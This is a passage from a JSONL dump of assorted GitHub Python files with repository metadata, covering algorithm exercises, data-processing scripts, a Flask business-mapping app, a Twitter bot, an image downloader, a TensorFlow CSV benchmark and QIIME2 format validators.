CollectionProxy(self._entity['collection'])\n return self._collection\n def findDocument(self,name):\n if name:\n document = self._documentManager.findOne(self.collection.name,name)\n if document:\n return DocumentProxy(document,self._documentManager,self._routeManager)\n return None\n def clear(self):\n self._entity = None\n if isinstance(self._collection,CollectionProxy):\n self._collection.clear()\n self._collection = None\n def getDocumentUrl(self,collection=None,name=None):\n if collection==None:\n collection = self.collection.name\n if name==None:\n name = self.name\n return self._routeManager.getDocumentUrl(collection,name)\n\ndef YamlToDict(textValue):\n return yaml.safe_load(textValue)\n\ndef DictToYaml(dictValue):\n return yaml.safe_dump(\n dictValue,\n default_flow_style=False,\n allow_unicode=True\n )\n","repo_name":"rindow/pyrindow-cms-pages","sub_path":"lib/pyrindow/cms/pages/model/appearance.py","file_name":"appearance.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3754750812","text":"from sys import stdin\nread = stdin.readline\n\nlst = []\nN = int(read())\n\nfor _ in range(N):\n lst.append(list(map(int, read().split())))\n\n#list안에 리스트들을 하나씩 꺼내는데 2번째 리스트부터 꺼내기 때문에 range를 1부터 설정\nfor i in range(1, N):\n for j in range(len(lst[i])):\n \n #경우의 수 3가지 존재\n #제일 첫번째에 있는 경우, 즉 index가 항상 0인 애들\n if j == 0:\n lst[i][j] += lst[i-1][j]\n \n #제일 마지막에 있는 경우, 즉 리스트의 마지막 숫자들\n elif j == len(lst[i]) - 1:\n lst[i][j] += lst[i-1][j-1]\n \n #중간에 있는 애들 두가지 index 중에 가장 큰 값을 선정\n else:\n lst[i][j] += max(lst[i-1][j-1], lst[i-1][j])\n\nprint(max(lst[N-1]))","repo_name":"KB-team3/AlgoGGang","sub_path":"김태선/Week_7/B1932_정수삼각형.py","file_name":"B1932_정수삼각형.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"942062517","text":"from random import randrange\nimport datetime \nimport copy\nimport json\n\nwith open('random_transactions_five.json') as f:\n data = json.load(f)\n\nresult = []\ncurrent = []\ni = 0\n\nfor each in data:\n if i%4 == 3:\n current = []\n for j in range(i - 3, i + 1):\n for trans in data[j]:\n if trans[\"status\"] == \"VALID\":\n trans[\"block\"] = i/4\n if trans[\"status\"] == \"UNRECORDED\":\n trans[\"block\"] = \"undefined\"\n current.append(trans)\n result.append(copy.deepcopy(current))\n current = []\n else:\n for trans in each:\n newTrans = {\"from\": trans[\"from\"], \"to\": trans[\"to\"], \"time\": trans[\"time\"], \"amount\": trans[\"amount\"], \"status\": \"UNRECORDED\", \"block\": \"undefined\"}\n current.append(newTrans)\n result.append(copy.deepcopy(current))\n i += 1\n\nwith open('data.json', 'w') as outfile:\n json.dump(result, outfile)\n","repo_name":"LTZX/BitCoin-Visualization","sub_path":"data/dataProcess-new.py","file_name":"dataProcess-new.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30124121328","text":"\"\"\"\r\n\"\"\"\r\n\r\nfrom .BaseSVG import BaseSVG\r\nfrom .__magic__ import xmlrepr, xmleval, name, check\r\n\r\nclass Container(object):\r\n \"\"\"\r\n \"\"\"\r\n\r\n __list_type__ = BaseSVG\r\n\r\n def __init__(self, elements=[]):\r\n \"\"\"\r\n Initializes.\r\n \"\"\"\r\n self.elements = elements\r\n\r\n def __xml_repr__(self, new_tag):\r\n tag = xmlrepr(super(self.__class__.__mro__[2], self).__thisclass__, self, new_tag) #assumes self.__mro__[1] == Container\r\n for element in self.elements:\r\n tag.append(xmlrepr(element, new_tag))\r\n return tag\r\n __xml_repr__.__doc__ = BaseSVG.__xml_repr__.__doc__\r\n\r\n @classmethod\r\n def __xml_eval__(cls, tag):\r\n group = xmleval(super(cls.__mro__[2], self), tag) #assumes cls.__mro__[1] == Container\r\n group.elements = [xmleval(cls.__list_type__, element) for element in tag.children]\r\n return group\r\n __xml_eval__.__doc__ = BaseSVG.__xml_eval__.__doc__\r\n\r\nclass Group(Container, BaseSVG): #favours Container\r\n \"\"\"\r\n \"\"\"\r\n\r\n __tag_name__ = 'g'\r\n __tag_attrs__ = {\r\n 'id':''\r\n }\r\n __svg_attrs__ = {}\r\n\r\n def __init__(self, id, elements=[]):\r\n \"\"\"\r\n Initializes.\r\n \"\"\"\r\n super(Container, self).__init__(elements)\r\n super(BaseSVG, self).__init__(id=id)\r\n\r\nclass Hyperlink(BaseSVG):\r\n \"\"\"\r\n \"\"\"\r\n\r\n __tag_name__ = 'a'\r\n __tag_attrs__ = {\r\n 'xlink:href':'',\r\n 'target':'_blank'\r\n }\r\n __svg_attrs__ = {\r\n 'url':str\r\n }\r\n __type__ = BaseSVG\r\n\r\n def __init__(self, url, wrapped):\r\n \"\"\"\r\n Initializes.\r\n \"\"\"\r\n super(BaseSVG, self).__thisclass__.__init__(self, url=url)\r\n if not isinstance(wrapped, self.__class__.__type__):\r\n raise TypeError()##\r\n self.wrapped = wrapped\r\n\r\n def __xml_repr__(self, new_tag):\r\n tag = xmlrepr(super(BaseSVG, self).__thisclass__, self, new_tag)\r\n tag.append(xmlrepr(self.wrapped, new_tag))\r\n return tag\r\n __xml_repr__.__doc__ = BaseSVG.__xml_repr__.__doc__\r\n\r\n @classmethod\r\n def __xml_eval__(cls, tag):\r\n hyper = xmleval(super(BaseSVG, self), tag)\r\n hyper.wrapped = xmleval(cls.__type__, tag.children[0])\r\n return hyper\r\n __xml_eval__.__doc__ = BaseSVG.__xml_eval__.__doc__\r\n","repo_name":"carrvo/GeomaticsTargetGenerator","sub_path":"GeomaticsTargetGenerator/SVGLibrary/Group.py","file_name":"Group.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9854296138","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ndate: 07/26/17\nauthor: stamaimer\nsource: https://leetcode.com/problems/single-number/#/description\ndifficulty: easy\n\"\"\"\n\n\nclass Solution(object):\n\n def singleNumber(self, nums):\n\n nums.sort()\n\n for num in nums[1:]:\n\n if nums[0] is None:\n\n nums[0] = num\n\n elif num == nums[0]:\n\n nums[0] = None\n\n return nums[0]\n\n\nif __name__ == '__main__':\n\n Solution().singleNumber([1, 0, 1])\n","repo_name":"stamaimer/LeetCode","sub_path":"136_single_number.py","file_name":"136_single_number.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32364076261","text":"## PYTHON MODULE IMPORTS ##\nimport os\nimport time\nfrom collections import deque\n\n## MODULE DEPENDCIES ##\nimport tweepy\nfrom dotenv import load_dotenv\n\n## FILE IMPORT ##\nfrom nepowiki import *\n\nload_dotenv()\n\n# Now you can access the variables like this\nconsumer_key = os.getenv(\"API_KEY\")\nconsumer_secret = os.getenv(\"API_SECRET\")\naccess_token = os.getenv(\"ACCESS_TOKEN\")\naccess_token_secret = os.getenv(\"ACCESS_SECRET\")\n\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\n# Create API object\napi = tweepy.API(auth)\n\n\n\n# Create a queue to store the celebrities\ncelebrities = deque()\n\n# Read the celebrities list from the text file and add them to the queue\nwith open(\"celebs.txt\", \"r\") as file:\n for line in file:\n celebname = line.strip()\n celebrities.append(celebname)\n\nwhile celebrities:\n # Get the next celebrity from the front of the queue\n celebname = celebrities.popleft()\n parents = get_parents(celebname)\n if len(parents)==0:\n momdad = get_momdad(celebname)\n else:\n momdad = ''\n relatives = get_relatives(celebname)\n text = ''\n # Construct the tweet text\n if len(parents)==0 and len(momdad)==0:\n text = f\"{celebname} has 0 blue-linker parents{os.linesep}--not a nepo baby--\"\n elif len(parents)>0 and len(momdad)==0:\n text = f\"{parents}\"\n elif len(momdad)>0 and len(parents)==0:\n text = f\"{momdad}\"\n \n if relatives is not None:\n text += f\"{relatives}\"\n\n if len(text) > 280:\n text = text[:240] + \"[THIS WAS LITERALLY TOO LONG TO TWEET]\"\n \n\n # Post the tweet\n api.update_status(text)\n time.sleep(2*60*60) # Sleep for 1 hour\n #Delete the celebrity from the celebs.txt file\n with open(\"celebs.txt\", \"r\") as file:\n lines = file.readlines()\n with open(\"celebs.txt\", \"w\") as file:\n for line in lines:\n if line.strip() != celebname:\n file.write(line)\n\n","repo_name":"jstebbs/nepowiki","sub_path":"app/tweetmachine.py","file_name":"tweetmachine.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73877582454","text":"import sys\n\nV = int(sys.stdin.readline())\ngraph = [[] for _ in range(V+1)]\n\nfor _ in range(V):\n info = list(map(int, sys.stdin.readline().split()))\n\n for i in range(1, len(info)//2):\n graph[info[0]].append((info[2*i-1], info[2*i]))\n\nresult = [0]*(V+1)\n\n\ndef dfs(start, result):\n for node, value in graph[start]:\n if result[node] == 0:\n result[node] = result[start]+value\n dfs(node, result)\n\n\ndfs(1, result)\nstartNode = result.index(max(result))\n\nresult = [0]*(V+1)\n\ndfs(startNode, result)\nresult[startNode] = 0\n\nprint(max(result))\n","repo_name":"gangslee/Coding-Test","sub_path":"백준/210430/1167 트리의 지름.py","file_name":"1167 트리의 지름.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70927296373","text":"__author__ = \"Thomas Bell\"\n\n__version__ = (0, 2, 0)\n__version_info__ = \".\".join(map(str, __version__))\n\nAPP_NAME = \"saving-place\"\nAPP_AUTHOR = \"/u/isurvived12\"\nAPP_VERSION = __version_info__\n\nUSER_AGENT = \"desktop:{}:v{} (by {})\".format(\n APP_NAME, APP_VERSION, APP_AUTHOR)\n\n","repo_name":"bell345/saving-place","sub_path":"savingplace/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7684859647","text":"from flask import render_template, url_for, flash, redirect, request,send_from_directory, jsonify\nfrom businessify import app, db, bcrypt\nfrom businessify.forms import RegistrationForm, LoginForm\nfrom businessify.models import User, Post\nfrom flask_login import login_user, current_user, logout_user, login_required\nimport businessify.service_layer.capital_one.merchant_data as merchant_data\nimport businessify.config_k as config, businessify.service_layer.data_handler as dh\nfrom businessify.service_layer import isochrone as isochrone\nimport os\n\n\ndata_handler = dh.DataHandler()\n\nsavedBusiness = []\n\n\n@app.route(\"/home\")\ndef home():\n data = data_handler.get_list_by_state(\"ON\")\n isc = isochrone.get_isochrone_os('38.903400', '-77.042090')\n access_token = config.MAPBOX_ACCESS_TOKEN\n return render_template('analyze.html', data=data, ACCESS_TOKEN=access_token, isc1=isc[0],isc2 = isc[1], isc10 = isc[2\n ])\n\n@app.route(\"/analyze\", methods = ['POST','GET'])\ndef analyze():\n name = request.form[\"name\"]\n type = request.form[\"type\"]\n location = request.form[\"address\"]\n savedBusiness.append(name)\n savedBusiness.append(type)\n savedBusiness.append(location)\n data = data_handler.get_list_by_category(type)\n isc = data_handler.get_isochrone(location)\n return render_template('analyze.html', data=data,isc1=isc[0],isc2 = isc[1], isc10 = isc[2], title = name, bname = name, btype = type, blocation = location)\n\n\n\n@app.route(\"/background_get_isochrone\", methods =['POST','GET'])\ndef background_test():\n print(\"test\")\n location = request.form[\"place\"]\n isc = data_handler.get_isochrone(location)\n print(\"Returned\")\n print(isc)\n return jsonify(isc_data = isc)\n\n@app.route(\"/background_get_cluster\", methods =['POST','GET'])\ndef background_get_cluster():\n print(\"cluster test\")\n state = request.form[\"state\"]\n cluster_data = data_handler.get_list_by_state(state)\n print(\"Returned\")\n print(cluster_data)\n return cluster_data\n\n@app.route(\"/\")\n@app.route(\"/analyze_form\")\ndef analyze_form():\n return render_template('analyze_form.html', title='Analyze')\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n user = User(username=form.username.data, email=form.email.data, password=hashed_password)\n db.session.add(user)\n db.session.commit()\n flash('Your account has been created! You are now able to log in', 'success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n flash('Login Unsuccessful. Please check email and password', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n\n@app.route(\"/account\")\n@login_required\ndef account():\n return render_template('account.html', title='Dashboard', bname = savedBusiness[0], btype = savedBusiness[1], blocation = savedBusiness[2] )\n\n\n\n@app.route('/map')\ndef map():\n #merchants = merchant_data.get_merchants()\n data = merchant_data.get_merchants_capital_one_json()\n isc = isochrone.get_isochrone_mapbox('-77.042090', '38.903400')\n\n access_token = config.MAPBOX_ACCESS_TOKEN\n print(access_token)\n return render_template('map-mapbox.html', data = data, ACCESS_TOKEN = access_token, isc = isc)\n\n\n@app.route('/map1')\ndef map1():\n data = data_handler.get_list_by_city(\"Vaughan\")\n isc = isochrone.get_isochrone_os('38.903400', '-77.042090')\n access_token = config.MAPBOX_ACCESS_TOKEN\n\n return render_template('map-google.html', data=data, ACCESS_TOKEN=access_token, isc=isc)\n\n\n@app.route('/service_layer/data/dataset.json')\ndef da():\n return send_from_directory(\"service_layer/data/\",\"dataset.json\")\n\n\n\n","repo_name":"iawale/Businessify","sub_path":"businessify/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15938341771","text":"\nimport os\nimport string\nimport tempfile\nfrom tensorflow.python.data.benchmarks import benchmark_base\nfrom tensorflow.python.data.experimental.ops import readers\nfrom tensorflow.python.data.ops import readers as core_readers\nfrom tensorflow.python.ops import parsing_ops\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.python.platform import googletest\nclass CsvDatasetBenchmark(benchmark_base.DatasetBenchmarkBase):\n FLOAT_VAL = '1.23456E12'\n STR_VAL = string.ascii_letters * 10\n def _set_up(self, str_val):\n gfile.MakeDirs(googletest.GetTempDir())\n self._temp_dir = tempfile.mkdtemp(dir=googletest.GetTempDir())\n self._num_cols = [4, 64, 256]\n self._num_per_iter = 5000\n self._filenames = []\n for n in self._num_cols:\n fn = os.path.join(self._temp_dir, 'file%d.csv' % n)\n with open(fn, 'w') as f:\n row = ','.join(str_val for _ in range(n))\n f.write('\\n'.join(row for _ in range(100)))\n self._filenames.append(fn)\n def _tear_down(self):\n gfile.DeleteRecursively(self._temp_dir)\n def _run_benchmark(self, dataset, num_cols, prefix, benchmark_id):\n self.run_and_report_benchmark(\n dataset=dataset,\n num_elements=self._num_per_iter,\n name='%s_with_cols_%d' % (prefix, num_cols),\n iters=10,\n extras={\n 'model_name': 'csv.benchmark.%d' % benchmark_id,\n 'parameters': '%d' % num_cols,\n },\n warmup=True)\n def benchmark_map_with_floats(self):\n self._set_up(self.FLOAT_VAL)\n for i in range(len(self._filenames)):\n num_cols = self._num_cols[i]\n kwargs = {'record_defaults': [[0.0]] * num_cols}\n dataset = core_readers.TextLineDataset(self._filenames[i]).repeat()\n self._run_benchmark(\n dataset=dataset,\n num_cols=num_cols,\n prefix='csv_float_map_decode_csv',\n benchmark_id=1)\n self._tear_down()\n def benchmark_map_with_strings(self):\n self._set_up(self.STR_VAL)\n for i in range(len(self._filenames)):\n num_cols = self._num_cols[i]\n kwargs = {'record_defaults': [['']] * num_cols}\n dataset = core_readers.TextLineDataset(self._filenames[i]).repeat()\n self._run_benchmark(\n dataset=dataset,\n num_cols=num_cols,\n prefix='csv_strings_map_decode_csv',\n benchmark_id=2)\n self._tear_down()\n def benchmark_csv_dataset_with_floats(self):\n self._set_up(self.FLOAT_VAL)\n for i in range(len(self._filenames)):\n num_cols = self._num_cols[i]\n kwargs = {'record_defaults': [[0.0]] * num_cols}\n dataset = core_readers.TextLineDataset(self._filenames[i]).repeat()\n self._run_benchmark(\n dataset=dataset,\n num_cols=num_cols,\n prefix='csv_float_fused_dataset',\n benchmark_id=3)\n self._tear_down()\n def benchmark_csv_dataset_with_strings(self):\n self._set_up(self.STR_VAL)\n for i in range(len(self._filenames)):\n num_cols = self._num_cols[i]\n kwargs = {'record_defaults': [['']] * num_cols}\n dataset = core_readers.TextLineDataset(self._filenames[i]).repeat()\n self._run_benchmark(\n dataset=dataset,\n num_cols=num_cols,\n prefix='csv_strings_fused_dataset',\n benchmark_id=4)\n self._tear_down()\nif __name__ == '__main__':\n benchmark_base.test.main()\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_3/csv_dataset_benchmark.py.transformed.py","file_name":"csv_dataset_benchmark.py.transformed.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13447261887","text":"# -*- coding: utf-8 -*-\n\n# !/usr/bin/python\n\n# Note: requires the tqdm package (pip install tqdm)\n\n# Note to Kagglers: This script will not run directly in Kaggle kernels. You\n# need to download it and run it on your local machine.\n\n# Downloads images from the Google Landmarks dataset using multiple threads.\n# Images that already exist will not be downloaded again, so the script can\n# resume a partially completed download. All images will be saved in the JPG\n# format with 90% compression quality.\n\nimport csv\nimport multiprocessing\nimport os\nimport sys\nfrom io import BytesIO\nfrom urllib import request\n\nimport tqdm\nfrom PIL import Image\n\ntrain_category_download_max_count = 50;\n\ndef parse_data(data_file):\n csvfile = open(data_file, 'r')\n csvreader = csv.reader(csvfile)\n id_url_cat_list = [line[:3] for line in csvreader]\n return id_url_cat_list[1:] # Chop off header\n\n\ndef download_image(id_url_cat):\n out_dir = sys.argv[2]\n\n if len(id_url_cat) >= 3:\n (id, url, cat) = id_url_cat\n else:\n (id, url) = id_url_cat\n cat = \"\"\n\n sub_folder = os.path.join(out_dir, cat)\n if not os.path.exists(sub_folder):\n os.makedirs(sub_folder)\n\n # If it's train data, only download train_category_download_max_count files\n if cat:\n path, dirs, files = next(os.walk(sub_folder))\n file_count = len(files)\n if file_count >= train_category_download_max_count:\n return 0\n\n filename = os.path.join(sub_folder, '{}.jpg'.format(id))\n\n if os.path.exists(filename):\n # print('Image {} already exists. Skipping download.'.format(filename))\n return 0\n\n try:\n response = request.urlopen(url)\n image_data = response.read()\n except:\n print('Warning: Could not download image {} from {}'.format(id, url))\n remove_file(filename)\n return 1\n\n try:\n pil_image = Image.open(BytesIO(image_data))\n except:\n print('Warning: Failed to parse image {}'.format(id))\n remove_file(filename)\n return 1\n\n try:\n pil_image_rgb = pil_image.convert('RGB')\n except:\n print('Warning: Failed to convert image {} to RGB'.format(id))\n remove_file(filename)\n return 1\n\n try:\n pil_image_rgb.save(filename, format='JPEG', quality=90)\n except:\n print('Warning: Failed to save image {}'.format(filename))\n remove_file(filename)\n return 1\n\n return 0\n\n\ndef remove_file(file_path):\n try:\n os.remove(file_path)\n except:\n return 0\n\n return 0\n\n\ndef loader():\n if len(sys.argv) != 3:\n print('Syntax: {} <data_file.csv> <output_dir/>'.format(sys.argv[0]))\n sys.exit(0)\n (data_file, out_dir) = sys.argv[1:]\n\n id_url_cat_list = parse_data(data_file)\n pool = multiprocessing.Pool(processes=4) # Num of CPUs\n failures = sum(tqdm.tqdm(pool.imap_unordered(download_image, id_url_cat_list), total=len(id_url_cat_list)))\n print('Total number of download failures:', failures)\n pool.close()\n pool.terminate()\n\n\n# arg1 : data_file.csv\n# arg2 : output_dir\nif __name__ == '__main__':\n loader()\n","repo_name":"allenwu5/kaggle","sub_path":"GLRC/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30638352660","text":"\"\"\"\nSolution for 721. Accounts Merge\nhttps://leetcode.com/problems/accounts-merge/\n\"\"\"\nfrom collections import defaultdict\nfrom typing import List\n\nclass Solution:\n \"\"\"\n Runtime: 244 ms, faster than 44.73% of Python3 online submissions for Accounts Merge.\n Memory Usage: 27.5 MB, less than 11.11% of Python3 online submissions for Accounts Merge.\n \"\"\"\n def accountsMerge(self, accounts: List[List[str]]) -> List[List[str]]:\n \"\"\"\n Given a list accounts, each element accounts[i] is a list of strings, where the first element accounts[i][0] is a name, and the rest of the elements are emails representing emails of the account.\n\n Now, we would like to merge these accounts. Two accounts definitely belong to the same person if there is some email that is common to both accounts. Note that even if two accounts have the same name, they may belong to different people as people could have the same name. A person can have any number of accounts initially, but all of their accounts definitely have the same name.\n\n After merging the accounts, return the accounts in the following format: the first element of each account is the name, and the rest of the elements are emails in sorted order. The accounts themselves can be returned in any order.\n\n Example 1:\n Input:\n accounts = [[\"John\", \"johnsmith@mail.com\", \"john00@mail.com\"], [\"John\", \"johnnybravo@mail.com\"], [\"John\", \"johnsmith@mail.com\", \"john_newyork@mail.com\"], [\"Mary\", \"mary@mail.com\"]]\n Output: [[\"John\", 'john00@mail.com', 'john_newyork@mail.com', 'johnsmith@mail.com'], [\"John\", \"johnnybravo@mail.com\"], [\"Mary\", \"mary@mail.com\"]]\n Explanation:\n The first and third John's are the same person as they have the common email \"johnsmith@mail.com\".\n The second John and Mary are different people as none of their email addresses are used by other accounts.\n We could return these lists in any order, for example the answer [['Mary', 'mary@mail.com'], ['John', 'johnnybravo@mail.com'],\n ['John', 'john00@mail.com', 'john_newyork@mail.com', 'johnsmith@mail.com']] would still be accepted.\n Note:\n\n The length of accounts will be in the range [1, 1000].\n The length of accounts[i] will be in the range [1, 10].\n The length of accounts[i][j] will be in the range [1, 30].\n\n Args:\n accounts:\n\n Returns:\n\n \"\"\"\n return self.union_find(accounts)\n\n def dfs(self, accounts: List[List[str]]) -> List[List[str]]:\n \"\"\"\n A DFS solution that runs in O(NM) in time and O(N+M) in space where N = #\n of accounts and M = # of emails\n\n Args:\n accounts:\n\n Returns:\n\n \"\"\"\n name_map = {}\n graph = defaultdict(list)\n for account in accounts:\n for email in account[1:]:\n graph[account[1]].append(email)\n graph[email].append(account[1])\n name_map[email] = account[0]\n\n seen = set()\n res = []\n\n for email in graph:\n if email not in seen:\n seen.add(email)\n stack = [email]\n emails = []\n\n while stack:\n node = stack.pop()\n emails.append(node)\n\n for neigh in graph[node]:\n if neigh not in seen:\n seen.add(neigh)\n stack.append(neigh)\n res.append([name_map[email]] + sorted(emails))\n return res\n\n def union_find(self, accounts: List[List[str]]) -> List[List[str]]:\n \"\"\"\n \n\n Args:\n accounts:\n\n Returns:\n\n \"\"\"\n parents, rank = list(range(10001)), [0] * 10001\n\n def find(p):\n if parents[p] != p:\n parents[p] = find(parents[p])\n return parents[p]\n\n def union(p, q):\n p1, p2 = find(p), find(q)\n if p1 == p2:\n return\n if rank[p1] > rank[p2]:\n parents[p2] = p1\n elif rank[p1] < rank[p2]:\n parents[p1] = p2\n else:\n parents[p1] = p2\n rank[p2] += 1\n\n email_to_name = {}\n email_to_id = {}\n i = 0\n\n for account in accounts:\n for email in account[1:]:\n email_to_name[email] = account[0]\n if email not in email_to_id:\n email_to_id[email] = i\n i += 1\n union(email_to_id[account[1]], email_to_id[email])\n\n id_to_emails = defaultdict(list)\n for email in email_to_name:\n id_to_emails[find(email_to_id[email])].append(email)\n\n return [[email_to_name[v[0]]] + sorted(v) for v in id_to_emails.values()]\n","repo_name":"KKosukeee/CodingQuestions","sub_path":"LeetCode/721_accounts_merge.py","file_name":"721_accounts_merge.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41525877493","text":"import itertools\n\nimport pandas as pd\nfrom qiime2.plugin import ValidationError\nfrom qiime2.plugin import model\nfrom qiime2.metadata.base import is_id_header, FORMATTED_ID_HEADERS\nfrom q2_fondue.entrezpy_clients._utils import PREFIX\n\n\nclass SRAMetadataFormat(model.TextFileFormat):\n\n REQUIRED_IDS = [\n 'ID', 'Biosample ID', 'Bioproject ID', 'Experiment ID',\n 'Study ID', 'Sample Accession'\n ]\n REQUIRED_HEADER_FIELDS = [\n 'Organism', 'Instrument', 'Platform', 'Bases', 'Bytes', 'Public',\n 'Library Selection', 'Library Source', 'Library Layout'\n ]\n REQUIRED_HEADER_FIELDS.extend(REQUIRED_IDS)\n\n def _validate(self):\n df = pd.read_csv(str(self), sep='\\t')\n\n missing_cols = [\n x for x in self.REQUIRED_HEADER_FIELDS if x not in df.columns]\n if missing_cols:\n raise ValidationError(\n 'Some required columns are missing from the metadata file: '\n f'{\", \".join(missing_cols)}.'\n )\n\n # some IDs must be present in all samples\n nans = df.isnull().sum(axis=0)[self.REQUIRED_IDS]\n missing_ids = nans.where(nans > 0).dropna().index.tolist()\n if missing_ids:\n raise ValidationError(\n 'Some samples are missing IDs in the following fields: '\n f'{\", \".join(missing_ids)}.'\n )\n\n def _validate_(self, level):\n self._validate()\n\n\nSRAMetadataDirFmt = model.SingleFileDirectoryFormat(\n 'SRAMetadataDirFmt', 'sra-metadata.tsv', SRAMetadataFormat\n)\n\n\nclass SRAFailedIDsFormat(model.TextFileFormat):\n \"\"\"\n This is a \"fake\" format only used to store a list of failed SRA IDs,\n which can be converted to QIIME's metadata and input into any fondue\n action.\n \"\"\"\n\n def _validate_(self, level):\n df = pd.read_csv(str(self), sep='\\t', index_col=0)\n\n if df.shape[1] > 1:\n raise ValidationError(\n 'Failed IDs artifact should only contain a single column '\n 'with error message for the runs that could not be fetched '\n '(indexed by run ID).'\n )\n\n\nSRAFailedIDsDirFmt = model.SingleFileDirectoryFormat(\n 'SRAFailedIDsDirFmt', 'sra-failed-ids.tsv', SRAFailedIDsFormat\n)\n\n\nclass NCBIAccessionIDsFormat(model.TextFileFormat):\n \"\"\"\n This is a format used to store a list of SRA accession IDs (run,\n study, BioProject, sample and experiment IDs), which can be converted\n to QIIME's metadata. Artifacts containing of run, study and BioProject\n IDs can be input into any fondue action.\n \"\"\"\n\n ALLOWED_PREFIXES = tuple(itertools.chain(*[\n v for k, v in PREFIX.items()\n if k in ('bioproject', 'run', 'study', 'sample', 'experiment')\n ]))\n\n def _validate_id(self, _id: str):\n if not _id.startswith(self.ALLOWED_PREFIXES):\n raise ValidationError(\n 'Some of the provided IDs are invalid - only SRA run, study, '\n 'BioProject, sample and experiment IDs are allowed. Please '\n 'check your input and try again.'\n )\n\n def _validate_(self, level):\n df = pd.read_csv(str(self), sep='\\t')\n cols = df.columns.tolist()\n\n if df.shape[1] > 2 or (df.shape[1] == 2 and not any(\n x in cols for x in ['doi', 'DOI'])):\n raise ValidationError(\n 'NCBI Accession IDs artifact should only contain a single '\n 'column with IDs of the SRA runs, studies or NCBI\\'s '\n 'BioProjects and an optional column `doi` with '\n 'associated DOIs.'\n )\n\n # check that there is a valid ID header:\n if not any([is_id_header(x) for x in cols]):\n raise ValidationError(\n f'NCBI Accession IDs artifact must contain a valid '\n f'ID header from {FORMATTED_ID_HEADERS}.'\n )\n\n df.iloc[:, 0].apply(self._validate_id)\n\n\nNCBIAccessionIDsDirFmt = model.SingleFileDirectoryFormat(\n 'NCBIAccessionIDsDirFmt', 'ncbi-accession-ids.tsv', NCBIAccessionIDsFormat\n)\n","repo_name":"bokulich-lab/q2-fondue","sub_path":"q2_fondue/types/_format.py","file_name":"_format.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"8458638233","text":"# -*- coding: utf-8 -*-\n\n# -------------------------------------------------------------------------\n# AppConfig configuration made easy. Look inside private/appconfig.ini\n# Auth is for authenticaiton and access control\n# -------------------------------------------------------------------------\nfrom gluon.contrib.appconfig import AppConfig\nfrom gluon.tools import Auth\n\n# -------------------------------------------------------------------------\n# This scaffolding model makes your app work on Google App Engine too\n# File is released under public domain and you can use without limitations\n# -------------------------------------------------------------------------\n\nif request.global_settings.web2py_version < \"2.15.5\":\n raise HTTP(500, \"Requires web2py 2.15.5 or newer\")\n\n# -------------------------------------------------------------------------\n# if SSL/HTTPS is properly configured and you want all HTTP requests to\n# be redirected to HTTPS, uncomment the line below:\n# -------------------------------------------------------------------------\n# request.requires_https()\n\n# -------------------------------------------------------------------------\n# once in production, remove reload=True to gain full speed\n# -------------------------------------------------------------------------\nconfiguration = AppConfig(reload=True)\n\nif not request.env.web2py_runtime_gae:\n # ---------------------------------------------------------------------\n # if NOT running on Google App Engine use SQLite or other DB\n # ---------------------------------------------------------------------\n db = DAL(configuration.get('db.uri'),\n pool_size=configuration.get('db.pool_size'),\n migrate_enabled=configuration.get('db.migrate'),\n check_reserved=['all'])\nelse:\n # ---------------------------------------------------------------------\n # connect to Google BigTable (optional 'google:datastore://namespace')\n # ---------------------------------------------------------------------\n db = DAL('google:datastore+ndb')\n # ---------------------------------------------------------------------\n # store sessions and tickets there\n # ---------------------------------------------------------------------\n session.connect(request, response, db=db)\n # ---------------------------------------------------------------------\n # or store session in Memcache, Redis, etc.\n # from gluon.contrib.memdb import 